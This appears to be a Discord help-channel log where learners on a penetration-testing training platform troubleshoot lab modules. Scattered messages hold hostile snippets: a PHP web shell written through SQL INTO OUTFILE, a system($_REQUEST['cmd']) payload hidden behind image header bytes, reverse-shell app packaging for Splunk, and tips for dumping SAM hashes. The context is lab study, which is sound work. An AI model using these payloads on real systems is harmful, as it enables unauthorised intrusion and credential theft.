#modules

If it's in context of a command then there'll be a command surround it

Thank you so much! That is changing how I understand the material as a read it. thats an unlock for me.

Most modern tools use -p to denote the port, with netcat, -p is used to denote the port binding on your system i.e. connecting to a target from your machine's specific port

shout-out to @pine dagger without him, i can't finish Whitebox 101 module

sudo nc -p 53 ip port will bind port 53 as your connection port to the target port

🤯

Whereas ssh user@ip -p port means you're using ssh to connect to a target on that port (without -p, the port is implied default)

ahh - originally when I tried to answer the question I was thinking I needed to use this function - but first had to somehow find out how to gain the User info.

nope since netcat was discussed in this section; that's what they're expecting you to use

Anyone completed Advanced XSS and CSRF module

Hi community,

I'm having trouble with the "WINDOWS EVENT LOGS & FINDING EVIL: Tapping Into ETW" module lab.

SilkETW can't collect PID Parent Spoofing activity. I already executed it three times, no activity logged in etw.json file. The Process ID of spoolsv.exe is not searchable.

Did anybody experience this? Thanks.

I had the same issue, it seems like the format changed from the time the original module was created. I basically ran a powershell command to search the etw.json for the string 'Seatbelt' and saved it to a output text file. In the lecture, the answer is next to "ManagedInteropMethodName", so I searched for that string in the output text file.

Thank you! I found the answer. I did not realize about the format update. I got stuck here for weeks. 😅

Guys do we have to follow the order to access the next box in season 4 challenge

doesnt have anything to do with modules, read #rules and #welcome

I did different approach. I used the search PRINT command in chainsaw and got the same output. As fas as I know, it's already in UTC 2019-03-17T19:30:30.324836Z and I'm stuck right now 😅

The question did not mention to convert the time in UTC either. How did you get the correct time?

I assumed the creator made the box in the US and corrected for that.

Took me a few tries though I had to adjust by -8 hours.

Hi Hi, any moderator or administrator around? I can't seem to identify my htb account

I didn't expect to be saying this, but please be mindful when someone reaches out to you in DMs asking to verify the approach of solving an exercise, e.g., compare notes, etc. Consider if he wants to understand the exercise or get your notes to get the flag at the end. Thank you. Remember, you've put effort into understanding the topics and the exercises.

It's a main reason I decline unless it's just a switch of the frame of mind and spoilers get involved.

I don't mind sanity checks, but at least show me what you have tried so far and your way of working towards a solution.

whenever i ask for sanity cheks the first message should be: what have i tried, what domains/subdomains have i found, what ports have i found ect

so i can get a clear view of if i am missing something early on

this way i dont ask for payloads, but more of missing piece of information and i get actually get a sanity check for missing information or if i just cant get the exploit chain working

"Did you look at the thing?" Or "well... what can you do with x"

I.e. not all hashes need to be cracked

pth?

Yep

It's easy to think though "well I got a hash, can I crack it?"

When, with windows, the NT hash is as good as a password

ill admit, that before i started the ad module, i was one of them

Well because you just spent a module all about cracking hashes and passwords

And some pth

more about all i've done before the cpts module is linux machines, and its usually crack the hash

windows has opened my eyes lol

Hi ! I come here to search for help about the monitored Room, is it the right place to ask for help ?

#1195788403384516738

Thanks but I don't have access to this channel

This channel is for academy modules, you can access more of the server by following #welcome

Aka generally the first place to look when joining any server

Okay no problem, Thxs

Module: **WINDOWS PRIVILEGE ESCALATION ** - Miscellaneous Techniques
I don't understand the module - Cannot change the Always Install Elevated
settings - when I try to access Local Group Policy - I get access denied. How am I suppose to change the settings then? It is the first step..
Thanks!

it's about how that setting can be used to elevate privilege if it's enabled, if you're testing it against the target machine you don't have admin rights to enable it

I’ve just started the senior web penetration tester path. What is the preferred method of providing feedback on any modules (either for tips to improve content or to report errors?)

In the "Attacking Common Services - Skill Assesment easy",|| i found the flag using "select LOAD_FILE ...", but wasnt able to get a webshell.
For the webshell i tried somehting like "SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/xampp/webshell.php'" for a PoC, like mentioned in the module. The command executed with no errors, but the directory stays empty and when going to the path, i get "not found". Anyone an idea why?||

#858470491676737536 is for suggesting fixes/alterations to modules

Using full paths helps, also if you wanna see where it goes, repeat the command and it'll tell you the file path already exists

Write manually

bro now I have a same problem I need your help,can I dm you

Rewriting things in your own words is proven to improve retention

hi i have problem in Out-of-Band DNS
section, find flag but not full flag its weird

Should i guess the path, or is there a way to find out? I mean i kinda guessed where to flag was aswell.

Knowing where webroots are helps

It's something you can google

hello

nvm solved

I'm struggling to understand the reasoning behind and the concept of unmanaged PowerShell injection after reading the module several times over.

Is the point of this technique so that attackers can avoid detection by injecting powershell.exe into unmanaged processes so that arbitrary code execution can take place (through PowerShell) under the guise of legitimate processes?

Yes

hey, does the basic_bruteforce.py work on question2 in Broken Authentication: Weak Bruteforce Protections ??

Hello

i've a problem in Footprints medium lab...
I try to get the important file but i have an error and can't figured it out 😦

Mate you’re getting automodded lol

Stop trying to send it

Well i don't know why xD

Just ask your question

btw :
i've a problem in Footprints medium lab...
I try to get the important file but i have an error and can't figured it out 😦
smb: > get important.txt
Error opening local file important.txt

(i'm logged on smb serv)

What folder are you in on your host?

I'm in devshare

Your host

Not the smb share

A custom folder on desktop (/home/kali/Desktop/HTB/test/)

Weird

Strange

You can access that file via rdp anyway

That too

But you’re using smbclient -U alex \\\\<ip>\\devshare ?

i'm using : smbclient -U alex //<IP>/devshare

Functionally the same

Should be the same

yeah 😦

rdp you can view the file ¯_(ツ)_/¯

Okay i'l try that

https://tenor.com/view/work-socks-sponebob-covering-face-krusty-krab-gif-4904461045554547636

Gg embed

Give me your computer

i think you just need to modify it a little bit

😄

yeah sure, i modified it i added the X-Forwarded header but its does not work ? i use the .csv wordlist provided in the script

i also tried to modify and change the value of this header after in every request, but it didn't work

you don’t bruteforce the second question

send a request with an authorizated x-forwarded header

😉

Ok thanks for your answer.. but still - I try to get the reverse shell to work, but it doesn't, and I have a feeling that it because I don't have that enabled..
This is written at the end of the section: This issue can be mitigated by disabling the two Local Group Policy settings mentioned above.

lol, thanks it worked, the description is not very clear of this question

if it's not enabled then privesc using that wouldn't work, try another way to get the flag

Good to know I'm on the right track at least.

So I'm under the belief that PowerShell (cmdlets...?) are in C#... therefore, that's why we look to see if clr.dll and clrjit.dll are running because the presence of them running together under an unmanaged process is a tell tale sign that Common Language Runtime, the runtime environment needed to process the PowerShell (C#) code, is present, which then indicates potential injection...?

I'm not sure lol I don't look deep into it. I'm just going off of base knowledge ¯_(ツ)_/¯

Thats something you can Google to find out

are there recommendations for things to do after completing htb getting started?

INFORMATION SECURITY path

is it recommended to subscribe to vip? or no

you mean the main platform ?

for htb yes

not really

Vip has no bearing on academy

oh the getting started path for tier0-2 has half of them locked

behind vip

Oh. Starting-point

Which is on the main labs site not academy, read #welcome to see how to access more of the server

identify doesn't work for some reason

You need an account on https://app.hackthebox.com

I have one

then ig you gotta message a mod/admin to get it sorted ¯_(ツ)_/¯

Usually what messes with it is your dms being closed

Which you can temporarily switch it to allow from same server

here we go again

should I use the seriusbreakrule?

<@&861185840277487616>

yep that one

✨ Fuck off ✨

Lol they left

somethings never change

message deleted

smh

I think longest I've seen shit like that was ~10 minutes

it's so common in cibersecurity servers

Anyway here's some mods that might be able to help you link your account

hey hackers

oh no

someone help me please #1197141712435433583

No

noob hackers

It looks like a connection was made so I see no issues

If you jump straight to insults, you're less likely to get help

Also this channel is for assistance with academy modules

Not some random shit you're doing

in payloads and shells module, php shells section, last question, whatever php shell I upload it is just rendering as text, not sure what's preventing it from working properly

What webshell are you using?

Did you upload it to the right place?

I've tried with p0wnyshell and with wwwolf's PHP web shell listed in the text

I was able to use wwwolf

I remember that module. I used wwwolf too. It should work

I've definitely uploaded it to the right spot and it's just rendering as text

Should be able to follow the section to a T

Are you intercepting with burp?

yeah I've done everything right as far as I'm aware, maybe I'll reset the lab

Change content-type?

yeah I've tried with a couple of image file types as well

the shell is being uploaded, it's just not executing, it's printing the code to the page

Should work with image/gif

that's with image/gif, wwwolf, reset lab etc

no idea why it won't work

I dont recall having issues tbh

finally got it working with a much smaller cmd shell from revshells. weird

it's likely you may have needed to slightly change something in the php ¯_(ツ)_/¯

are you using udp connection by any chance and some packets got dropped?

nah i'm using TCP ¯_(ツ)_/¯

lol I figured it out, wget was adding a bunch of stuff to the start of the php files when I grabbed em from github, whoops

https://tenor.com/view/zragon-infinity-monkey-funny-hit-head-gif-25650631

just git clone it

wget raw files only

Also that

lesson learned boiz

All this sums up to : user error

hi

check the files you download

Module: OSINT: CORPORATE RECON
Section: Cloud Storage

I'm kind of stuck on finding the buckets name. I've tried the searchcode, grayhatwarfare & some Dorking but can't come up with anything when searching for several files.
Any tips?

I haven't done it cuz expensive.

But If it's related to a website, could you find the bucket name in the request?

Just ignore me, hopefully someone else can help

If it only was that easy 😄

What kind of info do you have to start with?

The question is: "Investigate the website and find the bucket name of AWS that the company used and submit it as the answer. (Format: sub.domain.tld)" from inlanefreight.com

And that's it really 😛 Some course content about searchcode, grayhatwarfare and google dorking

From the course content I think I'm supposed to search for the files somewhere

That's interesting. I'd check the network and look at the Post/get request as well as any API calls

yea done all that but it's not obvious 😛

or I'm looking over something but I've been at it for 2 days now >.<

It's been a while... I just remember a ctf challenge where I had to mess with buckets.

We could see that it was reaching for it to fetch the images so we got the address. Then I think there were some websites that did stuff.

Or maybe I directly tried to connect to it with aws' management cli... But I didn't take good notes so I don't remember.

Well... Maybe someone can help better. Does it have something with the ffuf module?

are there any ongoing issues right now? have a hard time trying ssh:ing to machines

no, not the ffuf module.

Like subdomain enumeration

Nah it's OSINT and enumeration is not OSINT 😛

hmm maybe its just Linux priv esc then

I'm probably missing something obvious so someone who did it could push me into the right direction 😛

That's true.

Maybe some link on the webpage redirects to the subdomain.

If it's the same standard inland freight website that exists in the other modules... I could probably try to wrack my head with you.

All I have is will, the expertise is still not get there hehe

good insights actually! Lemme look around!

Manually review JavaScript files as well

can someone explain how snmpwalk dump all those strings , is it just reading OIDs or I am missing something ?

I found it

it collects output for each sub oid encountered during the walk and displays it to you

i think

I'm doing the labs for the pivoring module and I'm unable to connect to the remote Ubuntu server

At least, it's extremely slow

How did you find it? 😛 Was the subdomain the right direction?

nope it's one of the main pages, just curl and grep

Mind if I DM you for a sec?

go ahead

heyy anyone have an idea how by pass this problem even running powershell as administrator i can't see the hash from the SAM hive on windows11

did you manage to solve this? i am having the same issue, whereby i sanitized length and type and replaced with console.log

what are you trying to run?

I'm trying to read the password hashes in a user's SAM table, should I read the nstd file directly? I'm trying to understand why even as an administrator I can't read the hashes.

cmd ```$registryPath = "HKLM:\SAM\SAM"
PS C:\WINDOWS\system32> try {

#

$registryItem = Get-Item -LiteralPath $registryPath


$registryProperties = Get-ItemProperty -LiteralPath $registryPath


$registryProperties

} catch {
Write-Host "Error: $_.Exception.Message"
}```

the hives are locked on a live system, reg save first

is it possible to deactivate the protection to obtain the hash cache?

Hi guys is there anyone have bad connection with the pwnbox? it's really slow and lagy for me when I connect

İ think you need to change server

I tried to change the server still very slow

Pwnbox has a bunch of different servers some may be closer and less Laggy AFAIK the pwnbox server list shows latency

I picked the lowest one with latency UK then DE

Could be your network

Maybe it's time to switch to premium

afaik no, it's being used by the system itself, it's not just protection as much as it's needed for windows to function.

Premium? Lol neither labs nor academy has "Premium" as a subscription option

İ mean vip

Ah this channel is regarding htb academy and modules

Not the main site

Read #welcome

Also fwiw just set up your own vm

Ah I think I confused, sorry

I understand it would be necessary to copy the official hive into a new file ?

yes, reg save or vss

I study reg save it’s cool thanks 🫡

What module is this for btw? (Also I think password attacks or something goes over attacking SAM)

no it's not a module it was a question by chance because I was trying to access a registry but it was impossible for me to open it but thanks

This channel is got academy modules, remember, so any other practice you should be looking at other channels to post

Like #1024429874246590575 or #homelab-sysadm

anyone help me with the windows privilege escalation. im having trouble with my powershell

meh i think asking related questions are fine

ah yes i'm sorry as I'm used to this channel I forgot who else had one

trying to modify the druva powershell script to download a file to give me remote access but keep getting errors with the script

It's just missing context imo

Please who has completed the penetration testing path and is ready to share 🥺my license expired

?

License?

My subscription to the path

Don't call me dear

Sorry

Second you don't subscribe to a path, do you mean like silver annual? Or the student one?

Silver annual
On HTB enterprise

Module: CROSS-SITE SCRIPTING (XSS)
Section: PHISHING

Problem:
After injecting the XSS payload and check that page is displayed as intended, I verify the login form with a netcat listener but the LISTENER DOESN'T RECEIVE ANYTHING.

I browsed through Discord for similar problem, but it still doesn't work (port change, double quotes). What am I missing? Page displays as intended, maybe something is still missing in the XSS payload?

Enterprise is set up differently than regular, you're gonna have better luck contacting support

Fuck off

<@&861185840277487616>

ok how to contact htb i didnot receive 500 cubes this month i received only 300

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Have you upgraded the subscription?

yes i have upgraded the subscription

This is why you got the difference. You probably upgraded it in your current billing cycle. You will receive the full amount in the next billing cycyle.

but i have paid my amount for 500 cubes

I bet you paid the difference 🙂 Let's find out if you submit a ticket

Hola

English server friend

Yea its true sorry 😁

i cannot rise ticket from the academy

If you can't see the support bubble, disable adblock

i disabled it

Pop-up blockers can also mess with it

let me login throygh edge

ok now i got it

sent a message they didnot see yet

😦

Be patient dude

They're likely answering other requests too

Unfortunately yes

Yes, I put my IP as http and nc listening to 80. The Payload work and the page is reflected clean, but still netcat doesn't intercept nothing when I try to login

Careful just sharing the answers/methods

I recommend if you're gonna continue to take to dm (and delete these)

You mean me? I should delete?

Yes

Ok

At it can still be considered a spoiler

I recommend you guys go to dms with this

Not the appropriate place to ask for issues with a VM or linux host

ok mybad

Guys is gender neutral to mean multiple people

Let's knock it off with the thinly veiled transphobic comments

For Attacking Enterprise Networks: Exploitation & Privilege Escalation, I set up proxy chains and dynamic port forwarding, but the DNN keeps quitting on me. I can access the login page after waiting for a long time, and once it let me get past the login page but would not load the SQL console. In the ssh session I get messages "channel __: open failed: connect failed: temporary failure in name resolution"
As I get these messages, the page will still load but just slowly, it's just eventually I end up with a "connection has timed out" error

I have used this command: smtp-user-enum adding -w 20 and it has worked, after a few hours…

As an update to this. I just finished this module and the tool listed here shows the domain needed to answer the course flag. 🙃

noice, glad my old message still help

The sacred texts

Ya it was strange sublist3r wasn't consistent on listing the domain name. Had to run it 3 times before it would show up. The tool you mentioned works all the time. Along with the previous scans.

https://tenor.com/view/the-maze-runner-scorch-trials-what-did-you-see-gif-10018764

look into pivoting with tools such as look ligolo-ng but a standard ssh dynamic port forwarding will work just fine for this part, just use foxy proxy + firefox instead of something like proxychains + firefox

Just want to share what happened for the CROSS-SITE SCRIPTING (XSS) module and the PHISHING session in case someone else has problems receiving the request in the NETCAT LISTENER.

The payload was right, but I copied it from a code block in Obsidian. I identified this code block as JavaScript.

What happened is that when I grab the copy from there and paste it on site, it misinterprets the IP... Just as happened here, when I copied the command (now deleted because that was against the rules). When I copied the command here the IP final part changed, I didn't know why, but it was modified, like encoded.

As soon as I removed the code block type from the Obsidian note where the payload was copied... The netcat listener worked and received the request.

Man, for many this was easy but for a person without code block experience, this troubleshooting was a blast.

obsidian doesn't encode anything, you probably copied the url from your browser which was encoded

^

Browser likely encoded the %20 (spaces)

Guys I made my homework to narrow down the problem. If I copy the command from the Obsidian JavaScript code block here on Discord, the IP will result as changed... Only the IP. If you let me do it you will see

I think there is some sort of meta data embedded when you copy a command from an Obsidian code block that you identify as that language. Because when I copy it from a code block WITHOUT ANY IDENTIFICATION it worked

so discord is encoding the url then. I can tell you for a fact that obsidian doesn't change anything in codeblocks, if it does I will be using another app for notes

currently doing PasswordAttacks / SAM
i did the manual way, now tried with crackmapexec, crazy how fast it is using this tool instead of manual 😄

Hello team, user & root flag doesnt submit on Surveillance Machine: "Incorrect flag"

Not the place, contact support

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

my bad

@floral condor multi-line blocks are seen by discord as spam, you need to link your htb labs account to the discord to post them

I think this is the occasion to test by yourself. You should try the part of the Phishing session where you make sure that nc listened for the credentials.
Put the working payload in a code-block in Obsidian, but specify inside of the code-block(on top) the kind of programming language used. Then put the payload in another neutral code-block, without specification. Maybe I'm wrong

Here I copied it raw, without block

There's no Metadata type translation going on

I haven't tried with foxyproxy yet, I will give that a go. Thank you

the bots that manage and monitor the discord look at your messages differently depending on whether or not you are verified

Thanks

I have done that exercise and I know how obsidian works. the codeblock tag is just to tell obsidian what syntax to highlight it in, it doesn't change the behaviour of copying

It's like copying colored output from terminal and being sad it doesn't paste colored as its just copying the underlying text

As the highlight is done on a separate layer/interpretation

Get-ChildItem -Path "C:\Users\Administrator\Desktop\Blah" -Filter *.json | ForEach-Object { Get-Content $_.FullName | Select-String -Pattern "goofygoober" } | ForEach-Object { $_.Line + "`n" }

Like so

I guess you're right guys. I understand purpose of code-block, however I still don't understand why one worked and one not, by the way I unstuck and that is best part

Skill issue. Maybe a slight difference

I've typoed payloads before

It's OK blue teamer

@oblique dove this is the better place to ask module questions btw

I am stuck at "Practical Digital Forensics Scenario", I dont understand how on the basis of USN Journal I can find the process that created advanced_ip_scanner.exe

Timeline explorer 😄

there is literally no other exe

These entries aren't sorted by time

the screenshot has all the entries

It does not

You're filtering based on the entry number

I still dont get it, If I scroll manually thru the whole list I see it was extracted from a .zip file. Idk what to search for

then you have to track the .zip

not the exe

I have literally 0 clue

Well you already performed the needed steps to see that the .exe came from a .zip

just do the same to see where the .zip came from

I found the .csv file

Unsure of what you're referring to

But I also can't say much without spoiling the answer

you know that b come from a, now find a

Hey man I am having the same problem and would love a hint if you figured it out 🙂

You can DM

can this task just be done on the basis of USN Journal?

Hi would anyone be able to help me with Active Directory module skills assessment 1 last question, read flag on DC01 desktop. I have creds for machine but can’t get access to read the flag but I can dcsync and dump all hashes for users on the dc I’ve also tricked cme smb -x to read the file but nothing works

if you DCSync why not just log in as the Administrator

No service open to login

Yes there is

I am working through the CSP part right now and modifying my payload. I am able to use the iframe tag but cant find much use with it. any reading or section of the module you can suggest to help put me in the right direction?

Where abouts?

You can DM me.

will do

review your basic access methods for windows

Done it was being stupid, thanks anyway

Hi, I'm just getting started on the website- does completing sections in a module generally award additional cubes beyond the module reward? Or is it impossible to get a large amount of cubes without a subscription? I'm fine either way just wanna know what I'm getting into

Each module shows you in advance how many cubes it costs and how many cubes you will get back.

so you'd never get more cubes than you started with? fair enough

Nope

Depends if you have the annual subscription

Then you earn cubes by finishing modules and don’t need to buy them individually

mhm thanks

Foxy proxy still doesn't work, I have ssh dynamic port forwarding running, I set the proxies in Firefox to manual: 127.0.0.1:8081 and my foxyproxy to the same. I've tried with both socks 4 and socks 5. I've also tried with procychains.conf file containing the same or without it. Is this just one of those "restart it until it works" times? Or is my configuration wrong? I've tried restarting a couple times

hello, i get this error after adding a group to the sudoers file, what to do? Warning: /etc/sudoers:25:24: Cmnd_Alias "NOPASSWD" referenced but not defined

Hello everyone, I am doing the final exercise of this chapter: FILE UPLOAD ATTACKS, I managed to take all the information necessary to create a payload to create a reversed shell but I think I have a problem in my payload, could you help me?

����^@^PJFIF^@^A^A^A^A,^A,^@^@��^@dExif^@^@II*^@^H^@^@^@^B^@^N^A^B^@-^@^@^@&^@^>
<?php system($_REQUEST['cmd']);?>

wrong file type

take a look at wikipedias list of file types

hey guys, I have a Q on splukd
created a tarball, :
||splunk_shell/
splunk_shell/bin/
splunk_shell/bin/rev.py
splunk_shell/bin/run.bat
splunk_shell/bin/run.ps1
splunk_shell/default/
splunk_shell/default/inputs.conf||

in the ||rev.py|| I updated the IP & port, but I don't get a response from linux host, is there something I missed form the module?
https://academy.hackthebox.com/module/113/section/1213

Module: Attacking Authentication Mechanisms
Section: Weak Public/Private Keys
https://academy.hackthebox.com/module/170/section/1674

The start of the section stipulates navigating to http://sp1.htb.net and logging in with credentials shared in the SAML section. However when I click on the "Login (Weak Public/Private Key)" hyperlink, I'm redirected to a "Metadata Not Found" page on idp1.htb.net (and never given an opportunity to enter any credentials (see screenshot below). I think I've made an administrative error of some kind in setting up the lab, but I'm not sure.

EDIT: resetting the lab twice got it working.

I don't get a connection after updating the .spl file

can anyone help with the public exploits section in the getting started module, I can go over all ive done in dms and what exact step im stuck on, thanks!

You can explain what you've done here

If it's nmap: getting you nowhere

can anyone please help me with Advanced Deserialization Attacks - Example 1: JSON.. I have a payload but unable to get a shell

proxychains!!!

Hi there, is any HTB Moderator in the audience?, I'm trying to connect thru RDP to SeImpersonate and SeAssignPrimaryToken section Lab, but I' can't connect and getting a certificate error message

I rebooted the lab machine twice and same issue....

vv

hey im new to hack the box and Im having trouble with my first lab: Documentation & Reporting.Im completely stuck on the first question: Connect to the testing VM using Xfreerdp and practice testing, documentation, and reporting against the target lab. Once the target spawns, browse to the WriteHat instance on port 443 and authenticate with the provided admin credentials. Play around with the tool and practice adding findings to the database to get a feel for the reporting tools available to us. Remember that all data will be lost once the target resets, so save any practice findings locally! Next, complete the in-progress penetration test. Once you achieve Domain Admin level access, submit the contents of the flag.txt file on the Administrator Desktop on the DC01 host.

I dont want the answer I just want to learn the steps to find it. I literally just learned u have to connect to the hub like super noobie ;-;

I haven't done this particular module yet, but did you connect to the target VM using xfreerdp already?

i was doing other work, but i was able to use nmap scans and got the service running on port 22 and did a search for some exploits for that service which was OpenSSH 8.4p1 Debian 5+deb11u1. All i could find was a sid exploit which is exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection, there were a couple but this is the one i picked under sid but i picked this one i forgot why its been some hours since i was last on. when use the show options cmd im not sure what options i need to set. i know it says that any option that has yes needs to be set but i followed along with the section and just changed the RHOSTS and LHOST to what was shown and used check but got back an error. Am I using the wrong exploit search or am i supposed to find an ip to connect RHOSTS to and then keep LHOSTS tun0? Dm me with any helpful information thanks!

i searched that up but dint know what to fill in for server and port since it gave me an error

[options] server[:port] [[options] server[:port] ...] I used this which i found on die.net

im like super new to everything since it isnt my major but im takin it as an elective

Ah okay, I believe server should be the the IP which was generated when you spawned the machine. Please refer to this article and it walks you through connecting to a VM via xfreerdp:
https://medium.com/@laupeiip/how-to-rdp-into-a-tryhackme-windows-machine-with-your-kali-vm-f637cf7422d1

FYI, you can follow the same steps from the Pwnbox instance that uses Parrot

Wasn't sure which channel to publish this question in but since it's nmap related, I figured this was appropriate.

While performing an Nmap scan against a host, Paola determines the existence of a firewall.
In an attempt to determine whether the firewall is stateful or stateless, which of the following options would be best to use?

A. -sA
B. -sX
C. -sT
D. -sF

I think it's -sT since it attempts to establish a full connection, which will help with determining whether the firewall is stateful or stateless. But I'd love to hear your answers.

thank you so much i just needed help starting it

Is anyone around to help with footprinting medium lab

Have you found the solution for this? If not, here is the way.

But was this asked as part of a lab exercise? 🤔 Afaik, it was just mentioned for own researching

That module is one of the last modules in the CPTS path and expects you to know a lot already, it’s probably not a good first module if you are new

it was literally the first module for my class :'D the next one is footprinting

your class? you're doing HTBA in school?

Do you know the „draw the rest of the owl“ meme? That’s what this module is for beginners. It teaches you the theoretical aspects of documenting and that it is important (which is good to know as a beginner) but it ends with a „finish the pentest“ question for which you just aren’t equipped. So at least the final assessment is way out of scope for a first module but oh well

CIS4200.001S24.16561 Penetration Testing :,D

save me ;-;

Well to finish the module you just have to write „Done“ I think, but if you actually wanna do the pentest Eeeeh

Oh nvm you do need the flag huh

while it's great that you are doing that in school, documentation and reporting should absolutely not be the place to start if you're new, that module requires knowledge of all the previous modules, and is the second last module in the course. what is your instructor smoking?

he made it due on saturday but every section is like 100+ words and word vomit

i dont htink imma enjoy the course

i have no idea man its like a cs requirement

im an IT and this is my first hacking course

There are only a few modules that have this much text without Praxis questions, most of the other modules are way more hands on

thank u for the hope

that's because you got thrown in the deepend without knowing the basics

I have no words other than your school should do better

(they hate IT/Cybersecurity major)

they only give attention to med students or like compsci

Is it possible for you to contact the instructor and ask about having to do the final question? Tell them you read the contents of the module and maybe practice a bit with the reporting tool and then tell them you don’t feel equipped to do the pentest yet with what you have learned so far

hi~

Brothers, is there any correlation? LD_PRELOADThe shooting range of environmental rights.

🥲

im thinking of attending office hours and being like mn i dont get eny of this imma need extra help or extensions

I don't think it's you that's the problem. I bet your instructor just looked at the names and general content of the module and figured it is a good theroy module to get started without realizing that the module belongs to a path and is at the very end of it. Someone just needs to make them aware that the module ends with a pretty hard question that you just aren't prepared for

Yeah everything was going so well I’m just stuck on the lab question

Like I went back and tried to figure out how to do the lab but the beginning talks about documenting ur findings

And like scenarios of losing your work and having like a backup ? It’s completely different from the lab imo

yup. It is module number 27 of 28 of the CPTS path and it expects you to know the content of various other modules like the Active Directory Module or Password Attacks. What it wants you to do isn't hard, but if you don't have the knowledge from the other modules you will be lost pretty quickly

the Footprinting Lab you mentioned is module 4 of 28 of the CPTS path, that one you can do a lot easier without any previous knowledge

Hi guys! If anyone needs help on the Stack-Based Buffer Overflows modules(Linux and Windows) or Assembly modules feel free to dm

Okay I have to get something off my chest.

Hack the Box is INCREDIBLE! Truly, thank you guys!
The way the academy explains things, man if you concentrate and do the work, you WILL get better! Im by no means a beginner anymore but I always had issues with Sql Injections

and wow I finally fully get them, its an amazing feeling

rant over!

@next bronze btw I didnt pass OSCP the other day. Fell 10 points short. it was super annoying cus I got the 3 single machines, didnt have bonus points and couldnt get into ws01 for the AD set of machines. Otherwise I believe I could've got a perfect score. Cus Academy has taught me AD quite well...

But we move. Trying again in march

ah that sucks, so close, don't give up! you will get there 💪

absolutely, no doubt!

Hi, can I DM you about this Injection Attacks skill assessment? I have tried HTML Injection in PDF Generators at comment but don't work. I would love to chat with you and get a nudge ideas off. Thanks

hi folks,
is any third party service i can use to share my progress with employer with the link besides Student Transcript?

Sure, you can DM.

can I dm you

hello, i joined the platform 3 days ago and allwys i have 0 / 1 spawns left, if i buy the 18 dollars a month subscription, will it sort the problem?
also, im normal to pay with paypal at the internet, will it be safe to put my card?

If you buy any amount of cubes you get unlimited: I will also say, setting up your own virtual machine will be better

i dont what "setting up your own vm" means

Set up your own virtual machine

hello friends im currently stuck on the first question of the skills assessment of the intro to assembly can anyone point me towards how one can go about completing it im missing some thing maybe send me to some other learning resource with realivent info cause im completly lost

yea im not sure what it means

Use your own virtual machine instead of the one on the website

#modules message

the Vm is the window where i click start instance and then interact?

Yes, you can download and install one on your system instead of using that

Virtualbox and VMware are popular for windows systems

i thought this window is simulating the "target" , if i want another window like that, i need to get into another use PC, no?

There's a module called "Setting up" that walks through it

The target is separate from the pwnbox "start instance"

You can do it on the same pc

@next bronze Ive gotten prompt but it closes out on return tried sending it to provided box and it fails to load

ill get to it then, i finished the "into to accademy"

now im doing "learning proccess" "getting started" and "linux fundamentals"

what? the first question got nothing to do with the target

Then you didn't really pay attention, the "target" is always what's spawned with the "Click here to spawn target" you don't have to "spawn instance" with your own vm

They are separate buttons with separate functions

i guess i missed that info. thanks man for being so helpful and responsive

Hlo

@next bronze this question is confusing the crap out of me the shellcodes ive extracted just pops a broken command prompt

Also a vm allows you to be in more control of things

@frosty spade Can I DM you

Are you dming to help them?

i dont know where "click here to to spawn target" is, did i miss something

there's no need to run the shell code on the target, use the shellcode loader script. follow the steps I gave

It's right above the questions

Green text

@gray shoal as an example

can i dm you?

how to send screenshot here? prnt screen ctrl v doesnt work

The learning process module doesn't have target interactive sections

So you may not see it

yea i was just about to say that its not clickable

The intro module explains the different section types

If it's in the text section of the lesson, it won't be - you'll need to scroll down to the questions

It will be below the "spawn instance" window

The spawn target system button will ALWAYS be near the section questions

i had trouble because these are the instructions : Follow the steps below to complete this exercise.

Spawn your target!
Spawn My Workstation if you haven't done so.
From your workstation, open Firefox and browse to the target URL.
Answer the question below.

and the mozila firefox didnt apear for me, so i used chat gpt to give me a command to download it

i think i havent yet seen the spawn target system

If you're relying on chatGPT. Then you're not gonna learn

not relying on it but i ask question there sometime

like i ask here

Also: is English your first language?

no

Then that's why there's gonna be struggles

i speak english well tho

You're not understanding the material. However.

@next bronze ive looped it ended with a seg fault extracted with gdb but the shell just gives be an empty prompt

The workstation, "spawn instance" does in-fact have Firefox on it

xor [rdx], rbx
add rdx, 8
loop

The spawn target button would be located below that window, right above the first question

how to send screenshots here?

You need to link your app.hackthebox.com account following #welcome

But it's likely you misunderstood what you need to do

Literally just scroll down to where the questions are

And click the green text there

but i answered the questions correctly

Not the text that's detailing instructions in that section

did you remove the 0x

Then we're misunderstanding each other

You understand how to spawn and interact with targets, but there's a disconnect

The pwnbox. "Spawn Instance" is NOT the target

ok go on

@next bronze from the script? or from the gdp codes?

if i open mozilla firefox and join put the IP on the website line there, is it spawning a target?

then what is it? and what would the target be?

No

your shellcode should not contain 0x

The target is whatever IP is given to you when you click the Spawn target button

When you used the browser: that's just interacting with the target

@next bronze id does not contain any x0

id?

The target is already spawned before you put the ip in your browser

is the spawn target button should be clickable in the "introduction to academy" module?

Only above the questions directly. The in-text part is ONLY an example, you cannot click that

i dont see this button anywhere

oh

@next bronze my code starts with 4831c05048bbe67

found it

it gave me an ip like you said

with that ip, what do i do?

that seems right, dm me

It depends

Some targets will need you to authenticate to it via rdp/ssh if it's an ip:port generally they are interacted with via browser http://ip:port

However it's important to read the questions

thank you, ill continue

really thank you

Usually you will be told to 'ssh to ip with "username" and "password"'

The questions give more context to what you're specifically meant to do

okay

ill keep looking and learning

is it safe to put my credit card then? in the website?

Yes

thanks

I've not had any mysterious charges from htb

And I bought cubes over a year ago

i think the silver subcsription will be enough for me

200 cubes every month and if i correctly understood we are being refunded for every module we finish no?

right?

Sort of

Only tier0 give all their cubes back

The rest give 20%

oh

ok ill buy cubes if i have, for now i need the unlimited spawns

buying a monthly sub is cheaper in the long run ¯_(ツ)_/¯

yea just bought the 18 dollars monthly subscription

how do i cancel my membership if i want to?

In the billing page, there's a button that says "cancel subscription"

found it

just wanted to make sure it exists ^^

you should be payed by htbox

It would be illegal for them not to have one

Anyone available to support me on the "Detecting Attacker Behavior With Splunk Based On Analytics", I am quite sure that I have the correct query although cant get into the answer. Maybe something small 🤔

HI I've started recently HTB academy, I'm unable to start the machine (Spawn machine)

Hello everyone, I am doing the final exercise of this chapter: FILE UPLOAD ATTACKS, I managed to take all the information necessary to create a payload to create a reversed shell but I think I have a problem in my payload, could you help me? I am mainly looking for the procedure that I must carry out. I analyzed my files (upload.php and common-functions.php) so I am informed, I was told to do this but obviously it still does not work...

I did not take this module yet, but try the nullable byte, brute force the allowed executable extensions.
Try to submit a correct magic header bytes for the given image.

Filename.phar.jpeg
Sounds like there is a missing .php
